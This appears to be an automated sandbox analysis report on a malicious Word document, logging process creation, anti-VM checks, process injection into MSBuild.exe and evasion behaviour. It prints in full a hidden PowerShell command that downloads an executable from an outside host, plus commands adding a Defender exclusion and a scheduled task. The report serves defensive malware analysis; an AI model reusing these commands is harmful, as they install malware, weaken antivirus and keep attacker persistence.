Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\verclsid.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.985202832.0000000002890000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2720	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1284	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2544	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1484	Thread sleep time: -41226s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2452	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1448	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2476	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1224	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 808	Thread sleep count: 60 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1256	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1056	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1184	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 2868	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 804	Thread sleep count: 8031 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 672	Thread sleep time: -660000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 412	Thread sleep time: -41226s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1796	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 236	Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 152	Thread sleep time: -41226s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 1224	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\explorer.exe TID: 508	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 852	Thread sleep count: 60 > 30

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 240000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Roaming\explorer.exe	Window / User API: threadDelayed 9399	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Window / User API: threadDelayed 8031	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Window / User API: threadDelayed 6595

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 41226	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 41226	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 240000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 41226
Source: C:\Users\user\AppData\Roaming\explorer.exe	Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000001D.00000002.1030166755.000000000087D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware_S
Source: explorer.exe, 0000001D.00000002.1030821479.00000000008E7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARETSOFTWARE\Oracle\VirtualBox Guest Additions
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\NSYSTEM\ControlSet001\Services\Disk\Enum
Source: explorer.exe, 0000001D.00000002.1032548773.0000000002891000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\explorer.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe

Injects files into Windows application

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Injected file: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT was created by C:\Users\user\AppData\Roaming\explorer.exe	Jump to behavior
Source: C:\Windows\System32\notepad.exe	Injected file: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Source: C:\Windows\System32\notepad.exe	Injected file: C:\Users\user\AppData\Local\Temp\DZdtfhgYgeghD{ .scT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 414000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 419000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 54F000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 552000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 553000
Source: C:\Users\user\AppData\Roaming\explorer.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: FFFDE008

Bypasses PowerShell execution policy

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nop -sta -noni -w hidden -executionpolicy bypass -nologo -command "(new-object system.net.webclient).downloadfile('http://login.929389.ankura.us/awogyiwg/explorer.exe','c:\users\user\appdata\roaming\explorer.exe')	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\explorer.exe C:\Users\user\AppData\Roaming\explorer.exe
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eDdYRRbouy.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\explorer.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmp6336.tmp	Jump to behavior
